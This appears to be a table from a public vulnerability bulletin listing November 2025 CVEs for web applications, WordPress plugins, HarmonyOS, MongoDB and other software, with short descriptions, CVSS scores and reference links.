| code-projects--Library System | A vulnerability was found in code-projects Library System 1.0. This impacts an unknown function of the file /return.php. The manipulation of the argument ID results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. | 2025-11-24 | 6.3 | CVE-2025-13579 | VDB-333343 | code-projects Library System return.php sql injection VDB-333343 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699515 | code-projects Library System 1.0 SQL Injection https://github.com/rassec2/dbcve/issues/2 https://code-projects.org/ |
| code-projects--Library System | A vulnerability was determined in code-projects Library System 1.0. Affected is an unknown function of the file /mail.php. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-24 | 6.3 | CVE-2025-13580 | VDB-333344 | code-projects Library System mail.php sql injection VDB-333344 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699534 | code-projects Library System 1.0 mail.php SQL Injection https://github.com/rassec2/dbcve/issues/3 https://code-projects.org/ |
| code-projects--Online Bidding System | A weakness has been identified in code-projects Online Bidding System 1.0. This issue affects the function categoryadd of the file /administrator/addcategory.php. This manipulation of the argument catimage causes unrestricted upload. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. | 2025-11-24 | 4.7 | CVE-2025-13574 | VDB-333338 | code-projects Online Bidding System addcategory.php categoryadd unrestricted upload VDB-333338 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698717 | https://code-projects.org/ Online Bidding System In PHP With Source Code 1.0 Arbitrary File Upload Submit #698718 | https://code-projects.org/ Online Bidding System In PHP With Source Code 1.0 Arbitrary File Upload (Duplicate) https://github.com/Yohane-Mashiro/cve/blob/main/upload%201.md https://code-projects.org/ |
| contao--contao | Contao is an Open Source CMS. From version 4.0.0 to before 4.13.57, before 5.3.42, and before 5.6.5, back end users with precise control over the contents of template closures can execute arbitrary PHP functions that do not have required parameters. This issue has been patched in versions 4.13.57, 5.3.42, and 5.6.5. A workaround for this issue involves manually patching the Contao\Template::once() method. | 2025-11-25 | 6.6 | CVE-2025-65960 | https://github.com/contao/contao/security/advisories/GHSA-98vj-mm79-v77r https://contao.org/en/security-advisories/remote-code-execution-in-template-closures |
| deco-cx--apps | A security vulnerability has been detected in deco-cx apps up to 0.120.1. Affected by this vulnerability is the function AnalyticsScript of the file website/loaders/analyticsScript.ts of the component Parameter Handler. Such manipulation of the argument url leads to server-side request forgery. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 0.120.2 addresses this issue. It is suggested to upgrade the affected component. | 2025-11-30 | 6.3 | CVE-2025-13796 | VDB-333807 | deco-cx apps Parameter analyticsScript.ts AnalyticsScript server-side request forgery VDB-333807 | CTI Indicators (IOB, IOC, IOA) Submit #691837 | Deco deco-apps 0.114.12 - 0.120.1 Server-Side Request Forgery https://github.com/deco-cx/apps/pull/1360 https://github.com/deco-cx/apps/releases/tag/0.120.2 |
| docjojo--atec Duplicate Page & Post | The atec Duplicate Page & Post plugin for WordPress is vulnerable to unauthorized post duplication due to missing authorization validation on the duplicate_post() function in all versions up to, and including, 1.2.20. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate arbitrary posts, including private and password-protected posts, leading to data exposure. | 2025-11-25 | 5.3 | CVE-2025-13404 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a793b24f-979e-4209-93f7-cff8d3867a7d?source=cve https://plugins.trac.wordpress.org/browser/atec-duplicate-page-post/tags/1.2.20/includes/atec-wpdpp-hooks.php#L27 https://plugins.trac.wordpress.org/browser/atec-duplicate-page-post/tags/1.2.21/includes/atec-wpdpp-hooks.php#L27 |
| emrevona--WP Fastest Cache | The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpfc_db_fix_callback() function in all versions up to, and including, 1.4.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to initiate several database fix actions. This only affects sites with premium activated. | 2025-11-27 | 4.3 | CVE-2025-10476 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c24cf4de-1392-43a8-85a5-8c66c00c44d7?source=cve https://research.cleantalk.org/cve-2025-10476 https://plugins.trac.wordpress.org/changeset?old_path=/wp-fastest-cache/tags/1.4.0&new_path=/wp-fastest-cache/tags/1.4.1&sfp_email=&sfph_mail= |
| era404--StaffList | The StaffList plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-11-27 | 4.4 | CVE-2025-12185 | https://www.wordfence.com/threat-intel/vulnerabilities/id/45b9f761-1634-4f70-8c25-956d369cb6d8?source=cve https://wordpress.org/plugins/stafflist/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402164%40stafflist&new=3402164%40stafflist&sfp_email=&sfph_mail= |
| evolurise--Conditionnal Maintenance Mode for WordPress | The Conditional Maintenance Mode for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing nonce validation when toggling the maintenance mode status. This makes it possible for unauthenticated attackers to enable or disable the site's maintenance mode via a forged request granted they can trick an administrator into performing an action such as clicking on a link. | 2025-11-25 | 4.3 | CVE-2025-12586 | https://www.wordfence.com/threat-intel/vulnerabilities/id/535f1d8a-8266-4f90-82fa-9c32181bf277?source=cve https://plugins.trac.wordpress.org/browser/maintenance-mode-based-on-user-roles/tags/1.0.0/Maintenance_mode.php#L178 |
| favethemes--Houzez | The Houzez theme for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.1.6 due to insufficient input sanitization and output escaping in the houzez_property_img_upload() and houzez_property_attachment_upload() functions. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2025-11-26 | 6.1 | CVE-2025-9163 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e0e177f3-fb24-4dd5-80d5-19b113d5f527?source=cve https://favethemes.zendesk.com/hc/en-us/articles/360041639432-Changelog |
| favethemes--Houzez | The Houzez theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.1.6 via deserialization of untrusted input in saved-search-item.php. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. | 2025-11-26 | 6.3 | CVE-2025-9191 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b1c450d9-42d8-40f5-84fc-1bc0c8cfcf9b?source=cve https://favethemes.zendesk.com/hc/en-us/articles/360041639432-Changelog |
| fonttools--fonttools | fontTools is a library for manipulating fonts, written in Python. In versions from 4.33.0 to before 4.60.2, the fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main(). This issue has been patched in version 4.60.2. | 2025-11-29 | 6.3 | CVE-2025-66034 | https://github.com/fonttools/fonttools/security/advisories/GHSA-768j-98cg-p3fv https://github.com/fonttools/fonttools/commit/a696d5ba93270d5954f98e7cab5ddca8a02c1e32 |
| galdub--Folders Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager | The Folders - Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a misconfigured capability check on the 'wcp_change_post_folder' function in all versions up to, and including, 3.1.5. This makes it possible for authenticated attackers, with Contributor-level access and above, to move arbitrary folder contents to arbitrary folders. | 2025-11-27 | 4.3 | CVE-2025-12971 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f3845071-8419-4bb2-b22d-f9ae22fb7d6a?source=cve https://research.cleantalk.org/cve-2025-12971/ https://plugins.trac.wordpress.org/browser/folders/trunk/includes/folders.class.php#L3291 https://plugins.trac.wordpress.org/changeset/3402986/ |
| geoserver--geoserver | GeoServer is an open source server that allows users to share and edit geospatial data. Prior to version 2.25.0, a reflected cross-site scripting (XSS) vulnerability exists in the WMS GetFeatureInfo HTML output format that enables a remote attacker to execute arbitrary JavaScript code in a victim's browser through specially crafted SLD_BODY parameters. This issue has been patched in version 2.25.0. | 2025-11-25 | 6.1 | CVE-2025-21621 | https://github.com/geoserver/geoserver/security/advisories/GHSA-w66h-j855-qr72 https://github.com/geoserver/geoserver/pull/7406 https://github.com/geoserver/geoserver/commit/dc9ff1c726dd73c884437a123b4ad72b19383c7d https://osgeo-org.atlassian.net/browse/GEOS-11297 |
| getformwork--formwork | Formwork is a flat file-based Content Management System (CMS). Prior to version 2.2.0, inserting unsanitized data into the blog tag field results in stored cross‘site scripting (XSS). Any user with credentials to the Formwork CMS who accesses or edits an affected blog post will have attacker‘controlled script executed in their browser. The issue is persistent and impacts privileged administrative workflows. This issue has been patched in version 2.2.0. | 2025-11-25 | 6.5 | CVE-2025-65956 | https://github.com/getformwork/formwork/security/advisories/GHSA-7j46-f57w-76pj https://github.com/getformwork/formwork/pull/791 https://github.com/getformwork/formwork/commit/4abcd60ae7692b46d316f956b0b20fb85336f3b2 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.3 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that under specific conditions could have allowed an unauthenticated user to join arbitrary organizations by changing headers on some requests. | 2025-11-26 | 6.5 | CVE-2025-12653 | GitLab Issue #579372 HackerOne Bug Bounty Report #3370245 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 8.3 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that could have allowed an authenticated user with specific permissions to cause a denial of service condition through HTTP response processing. | 2025-11-26 | 6.5 | CVE-2025-7449 | GitLab Issue #554938 HackerOne Bug Bounty Report #3215054 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 13.7 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that could have allowed an authenticated user to view information from security reports under certain configuration conditions. | 2025-11-26 | 4.3 | CVE-2025-6195 | GitLab Issue #549937 HackerOne Bug Bounty Report #3155693 |
| gungorbudak--Shouty | The Shouty plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the shouty shortcode in all versions up to, and including, 0.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-27 | 6.4 | CVE-2025-12712 | https://www.wordfence.com/threat-intel/vulnerabilities/id/28252c89-a2db-441a-93e6-f051f3649fea?source=cve https://plugins.trac.wordpress.org/browser/shouty/tags/0.2.1/shouty.php#L138 https://plugins.trac.wordpress.org/browser/shouty/tags/0.2.1/shouty.php#L139 |
| gwendydd--Chamber Dashboard Business Directory | The Chamber Dashboard Business Directory plugin for WordPress is vulnerable to unauthorized data export due to a missing capability check on the cdash_watch_for_export() function in all versions up to, and including, 3.3.11. This makes it possible for unauthenticated attackers to export business directory information, including sensitive business details. | 2025-11-25 | 5.3 | CVE-2025-13414 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1896885a-a104-464a-bb57-2c3c73ff9415?source=cve https://plugins.trac.wordpress.org/browser/chamber-dashboard-business-directory/trunk/options.php#L850 https://plugins.trac.wordpress.org/browser/chamber-dashboard-business-directory/tags/3.3.11/options.php#L850 |
| Huawei--HarmonyOS | Permission control vulnerability in the print module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 6.2 | CVE-2025-58294 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Identity authentication bypass vulnerability in the Gallery app. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 6.2 | CVE-2025-58305 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | UAF vulnerability in the screen recording framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-11-28 | 6.4 | CVE-2025-58307 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the startup recovery module. Impact: Successful exploitation of this vulnerability will affect availability and confidentiality. | 2025-11-28 | 6.8 | CVE-2025-58309 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Vulnerability of accessing invalid memory in the component driver module. Impact: Successful exploitation of this vulnerability will affect availability and confidentiality. | 2025-11-28 | 6.6 | CVE-2025-58314 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | UAF vulnerability in the USB driver module. Impact: Successful exploitation of this vulnerability will affect availability and confidentiality. | 2025-11-28 | 5.8 | CVE-2025-58311 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the App Lock module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-11-28 | 5.1 | CVE-2025-58312 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the Wi-Fi module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 5.5 | CVE-2025-58315 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the Notepad module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 5.1 | CVE-2025-64311 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Denial of service (DoS) vulnerability in the office service. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-11-28 | 5.3 | CVE-2025-64313 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the file management module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 4.9 | CVE-2025-58304 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the file management module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 4.9 | CVE-2025-64312 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Configuration defect vulnerability in the file management module. Impact: Successful exploitation of this vulnerability may affect app data confidentiality and integrity. | 2025-11-28 | 4.4 | CVE-2025-64315 | https://consumer.huawei.com/cn/support/bulletinlaptops/2025/11/ |
| humhub--cfiles | Files is a module for managing files inside spaces and user profiles. Prior to versions 0.16.11 and 0.17.2, insufficient authorization checks allow non-member users to create new folders, up- and download files as a ZIP archive in public spaces. Private spaces are not affected. This issue has been patched in versions 0.16.11 and 0.17.2. | 2025-11-25 | 5.4 | CVE-2025-65963 | https://github.com/humhub/cfiles/security/advisories/GHSA-rv2x-7qwp-2hf4 https://github.com/humhub/cfiles/commit/75698f8e8f360cea470f0e9f264015b697ab4c09 |
| IBM--Concert | IBM Concert 1.0.0 through 2.0.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. | 2025-11-24 | 5.9 | CVE-2025-36150 | https://www.ibm.com/support/pages/node/7252019 |
| IBM--Sterling B2B Integrator | IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.0.0.0 through 6.1.2.7 and 6.2.0.0 through 6.2.0.5 and 6.2.1.1 could reveal sensitive server IP configuration information to an unauthorized user. | 2025-11-24 | 5.3 | CVE-2025-36112 | https://www.ibm.com/support/pages/node/7252197 |
| Iteras--Peppol-py | Peppol-py before 1.1.1 allows XXE attacks because of the Saxon configuration. When validating XML-based invoices, the XML parser could read files from the filesystem and expose their content to a remote host. | 2025-11-28 | 5 | CVE-2025-66371 | https://github.com/iterasdev/peppol-py/pull/16 https://github.com/iterasdev/peppol-py/releases/tag/1.1.1 |
| itsourcecode--Student Information System | A vulnerability was identified in itsourcecode Student Information System 1.0. Affected by this vulnerability is an unknown functionality of the file /schedule_edit1.php. Such manipulation of the argument schedule_id leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. | 2025-11-24 | 6.3 | CVE-2025-13581 | VDB-333345 | itsourcecode Student Information System schedule_edit1.php sql injection VDB-333345 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699516 | itsourcecode Student Information System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/14 https://itsourcecode.com/ |
| karthiksg--Inline frame Iframe | The Inline frame - Iframe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'embedsite' shortcode in all versions up to, and including, 0.1. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-25 | 6.4 | CVE-2025-12645 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ceda1e49-4e65-4038-9207-ef4647838f53?source=cve https://plugins.trac.wordpress.org/browser/inline-frame-iframe/tags/0.1/iframe.php#L76 |
| KDE--Krita | In KDE Krita before 5.2.13, loading a manipulated TGA file could result in a heap-based buffer overflow in plugins/impex/tga/kis_tga_import.cpp (aka KisTgaImport). Control flow proceeds even when a number of pixels becomes negative. | 2025-11-26 | 6.7 | CVE-2025-59820 | https://invent.kde.org/graphics/krita/ https://kde.org/info/security/advisory-20250929-1.txt https://invent.kde.org/graphics/krita/-/commit/6d3651ac4df88efb68e013d21061de9846e83fe8 |
| kiteworks--security-advisories | Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, this vulnerability could allow an external attacker to gain access to log information from the system by tricking an administrator into browsing a specifically crafted fake page of Kiteworks MFT. This issue has been patched in version 9.1.0. | 2025-11-29 | 6.8 | CVE-2025-53897 | https://github.com/kiteworks/security-advisories/security/advisories/GHSA-cxwc-7899-3h4m |
| kiteworks--security-advisories | Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, an unfavourable definition of roles and permissions in Kiteworks MFT on managing Connections could lead to unexpected escalation of privileges for authorized users. This issue has been patched in version 9.1.0. | 2025-11-29 | 6.5 | CVE-2025-53900 | https://github.com/kiteworks/security-advisories/security/advisories/GHSA-gjq3-8v6p-2h6h |
| kiteworks--security-advisories | Kiteworks is a private data network (PDN). Prior to version 9.1.0, improper input validation when managing roles of a shared folder could lead to unexpectedly elevate another user's permissions on the share. This issue has been patched in version 9.1.0. | 2025-11-29 | 6.3 | CVE-2025-53939 | https://github.com/kiteworks/security-advisories/security/advisories/GHSA-hpf5-6376-2565 |
| kivitendo--kivitendo | Kivitendo before 3.9.2 allows XXE injection. By uploading an electronic invoice in the ZUGFeRD format, it is possible to read and exfiltrate files from the server's filesystem. | 2025-11-28 | 5 | CVE-2025-66370 | https://github.com/kivitendo/kivitendo-erp/blob/fd3f993fc731cbcaa5eb87d55df7c82df4df9c09/doc/changelog https://github.com/kivitendo/kivitendo-erp/commit/1286dee72f9919166178d0cdb5f52f13b0f7d4de https://github.com/kivitendo/kivitendo-erp/commit/f6ba56bd8d22a428534057589baace6b7bfdf2e9 https://blog.kivitendo.de/?p=1415 |
| liquidthemes--AI Engine for WordPress: ChatGPT, GPT Content Generator | The AI Engine for WordPress: ChatGPT, GPT Content Generator plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1. This is due to insufficient validation of user-supplied file paths in the 'lqdai_update_post' AJAX endpoint and the use of file_get_contents() with user-controlled URLs without protocol restrictions in the insert_image() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2025-11-25 | 6.5 | CVE-2025-13380 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae0abace-9bf6-4ef9-a9b8-7efffbf25628?source=cve https://plugins.trac.wordpress.org/browser/liquid-chatgpt/tags/1.0.1/liquid-chatgpt.php#L83 https://plugins.trac.wordpress.org/browser/liquid-chatgpt/tags/1.0.1/liquid-chatgpt.php#L315 https://plugins.trac.wordpress.org/browser/liquid-chatgpt/tags/1.0.1/liquid-chatgpt.php#L423 https://github.com/d0n601/CVE-2025-13380 https://ryankozak.com/posts/cve-2025-13380/ |
| listingthemes--WP Directory Kit | The WP Directory Kit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'order_by' parameter in all versions up to, and including, 1.4.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-11-27 | 6.1 | CVE-2025-13525 | https://www.wordfence.com/threat-intel/vulnerabilities/id/01cd3631-93fb-4016-baa4-8ea11b21acec?source=cve https://plugins.trac.wordpress.org/browser/wpdirectorykit/tags/1.4.4/application/views/wdk_messages/index.php#L38 https://plugins.trac.wordpress.org/browser/wpdirectorykit/tags/1.4.4/application/views/wdk_messages/index.php#L39 https://wordpress.org/plugins/wpdirectorykit/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3401078%40wpdirectorykit&new=3401078%40wpdirectorykit&sfp_email=&sfph_mail= |
| lKinderBueno--Streamity Xtream IPTV Player | A vulnerability was found in lKinderBueno Streamity Xtream IPTV Player up to 2.8. The impacted element is an unknown function of the file public/proxy.php. Performing manipulation results in server-side request forgery. The attack can be initiated remotely. The exploit has been made public and could be used. Upgrading to version 2.8.1 is sufficient to resolve this issue. The patch is named c70bfb8d36b47bfd64c5ec73917e1d9ddb97af92. It is suggested to upgrade the affected component. | 2025-11-24 | 6.3 | CVE-2025-13588 | VDB-333352 | lKinderBueno Streamity Xtream IPTV Player proxy.php server-side request forgery VDB-333352 | CTI Indicators (IOB, IOC, IOA) Submit #687573 | lKinderBueno Streamity Xtream IPTV Web player 2.8 Server-Side Request Forgery https://github.com/lakshayyverma/CVE-Discovery/blob/main/Streamity.md https://github.com/lKinderBueno/Streamity-Xtream-IPTV-Web-player/commit/c70bfb8d36b47bfd64c5ec73917e1d9ddb97af92 https://github.com/lKinderBueno/Streamity-Xtream-IPTV-Web-player/releases/tag/v2.8.1 |
| lyrathemes--Social Images Widget | The Social Images Widget plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'options_update' function in all versions up to, and including, 2.1. This makes it possible for unauthenticated attackers to delete the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-25 | 5.3 | CVE-2025-13386 | https://www.wordfence.com/threat-intel/vulnerabilities/id/95ab7473-e368-47ad-a8a0-0efbdafce562?source=cve https://plugins.trac.wordpress.org/browser/social-images-widget/tags/2.1/class-social-images-widget-settings.php#L44 https://plugins.trac.wordpress.org/browser/social-images-widget/trunk/class-social-images-widget-settings.php#L44 |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.2 - #164, an authorization bypass vulnerability in the AJAX flagging system allows any unauthenticated user to flag any content (users, videos, photos, collections) on the platform. This can lead to mass flagging attacks, content disruption, and moderation system abuse. This issue has been patched in version 5.5.2 - #164. | 2025-11-29 | 6.5 | CVE-2025-65113 | https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-9f8v-vph8-pq6q https://github.com/MacWarrior/clipbucket-v5/commit/a83b807e592f85d98f1f156bd3cbb1ffcc230233 |
| mahabubs--YouTube Subscribe | The YouTube Subscribe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-11-25 | 4.4 | CVE-2025-12025 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9996cdc7-4d97-4b27-b697-09bbdbcd865d?source=cve https://wordpress.org/plugins/easy-youtube-subscribe/ https://plugins.trac.wordpress.org/browser/easy-youtube-subscribe/tags/3.0.0/includes/sm-youtube-subscription-shortcode.php#L242 https://plugins.trac.wordpress.org/browser/easy-youtube-subscribe/tags/3.0.0/includes/sm-youtube-subscription-shortcode.php#L246 |
| Mattermost--Mattermost | Mattermost versions 11.0.x <= 11.0.2, 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 fail to sanitize team email addresses to be visible only to Team Admins, which allows any authenticated user to view team email addresses via the GET /api/v4/channels/{channel_id}/common_teams endpoint | 2025-11-27 | 4.3 | CVE-2025-12559 | https://mattermost.com/security-updates |
| MISP--MISP | app/Model/EventReport.php in MISP before 2.5.27 allows path traversal in view picture for a site-admin. | 2025-11-28 | 4.1 | CVE-2025-66386 | https://github.com/MISP/MISP/commit/7f4a0386d38672eddc139f5735d71c3b749623ce https://github.com/MISP/MISP/compare/v2.5.26...v2.5.27 |
| Mitsubishi Electric Corporation--GX Works2 | Cleartext Storage of Sensitive Information Vulnerability in GX Works2 all versions allows an attacker to disclose credential information stored in plaintext from project files. As a result, the attacker may be able to open project files protected by user authentication using disclosed credential information, and obtain or modify project information. | 2025-11-27 | 5.5 | CVE-2025-3784 | https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-016_en.pdf https://jvn.jp/vu/JVNVU95288056/ |
| MongoDB Inc.--MongoDB Server | Inconsistent object size validation in time series processing logic may result in later processing of oversized BSON documents leading to an assert failing and process termination. This issue impacts MongoDB Server v7.0 versions prior to 7.0.26, v8.0 versions prior to 8.0.16 and MongoDB server v8.2 versions prior to 8.2.1. | 2025-11-25 | 6.5 | CVE-2025-13507 | https://jira.mongodb.org/browse/SERVER-108565 |
| MongoDB Inc.--MongoDB Server | MongoDB Server may experience an invariant failure during batched delete operations when handling documents. The issue arises when the server mistakenly assumes the presence of multiple documents in a batch based solely on document size exceeding BSONObjMaxSize. This issue affects MongoDB Server v7.0 versions prior to 7.0.26, MongoDB Server v8.0 versions prior to 8.0.13, and MongoDB Server v8.1 versions prior to 8.1.2 | 2025-11-25 | 6.5 | CVE-2025-13644 | https://jira.mongodb.org/browse/SERVER-101180 |
| MongoDB Inc.--MongoDB Server | Clients may successfully perform a TLS handshake with a MongoDB server despite presenting a client certificate not aligning with the documented Extended Key Usage (EKU) requirements. A certificate that specifies extendedKeyUsage but is missing extendedKeyUsage = clientAuth may still be successfully authenticated via the TLS handshake as a client. This issue is specific to MongoDB servers running on Windows or Apple as the expected validation behavior functions correctly on Linux systems. Additionally, MongoDB servers may successfully establish egress TLS connections with servers that present server certificates not aligning with the documented Extended Key Usage (EKU) requirements. A certificate that specifies extendedKeyUsage but is missing extendedKeyUsage = serverAuth may still be successfully authenticated via the TLS handshake as a server. This issue is specific to MongoDB servers running on Apple as the expected validation behavior functions correctly on both Linux and Windows systems. This vulnerability affects MongoDB Server v7.0 versions prior to 7.0.26, MongoDB Server v8.0 versions prior to 8.0.16 and MongoDB Server v8.2 versions prior to 8.2.2 | 2025-11-25 | 4.2 | CVE-2025-12893 | https://jira.mongodb.org/browse/SERVER-105783 |
| n/a--Scada-LTS | A vulnerability was identified in Scada-LTS up to 2.7.8.1. Affected is the function Common.getHomeDir of the file br/org/scadabr/vo/exporter/ZIPProjectManager.java of the component Project Import. Such manipulation leads to path traversal. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 6.3 | CVE-2025-13791 | VDB-333795 | Scada-LTS Project Import ZIPProjectManager.java Common.getHomeDir path traversal VDB-333795 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690873 | SCADA-LTS Project Scada-LTS <= commit 1cfaed4b35117e4871bc3dfeae073f61d8e3bb3d Path traversal / Zip Slip leading to arbitrary file write https://github.com/Xzzz111/exps/blob/main/archives/Scada-LTS-ZipSlip-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/Scada-LTS-ZipSlip-1/report.md#proof-of-concept |
| n/a--Scada-LTS | A vulnerability was determined in Scada-LTS up to 2.7.8.1. This impacts an unknown function. This manipulation causes cross-site request forgery. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 4.3 | CVE-2025-13790 | VDB-333794 | Scada-LTS cross-site request forgery VDB-333794 | CTI Indicators (IOB, IOC) Submit #690871 | SCADA-LTS Project Scada-LTS <=1cfaed4b35117e4871bc3dfeae073f61d8e3bb3d Cross-Site Request Forgery (CSRF) https://github.com/Xzzz111/exps/blob/main/archives/Scada-LTS-CSRF-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/Scada-LTS-CSRF-1/report.md#proof-of-concept |
| n/a--ZenTao | A vulnerability was found in ZenTao up to 21.7.6-8564. This affects the function makeRequest of the file module/ai/model.php. The manipulation of the argument Base results in server-side request forgery. The attack can be launched remotely. The exploit has been made public and could be used. Upgrading to version 21.7.6 mitigates this issue. It is suggested to upgrade the affected component. | 2025-11-30 | 6.3 | CVE-2025-13789 | VDB-333793 | ZenTao model.php makeRequest server-side request forgery VDB-333793 | CTI Indicators (IOB, IOC, IOA) Submit #690728 | Zentao PMS <=21.7.6-85642 SSRF https://github.com/ez-lbz/ez-lbz.github.io/issues/2 https://github.com/ez-lbz/ez-lbz.github.io/issues/2#issuecomment-3540247346 https://github.com/ez-lbz/ez-lbz.github.io/issues/2#issue-3598317459 https://www.zentao.net/extension-viewext-6.html |
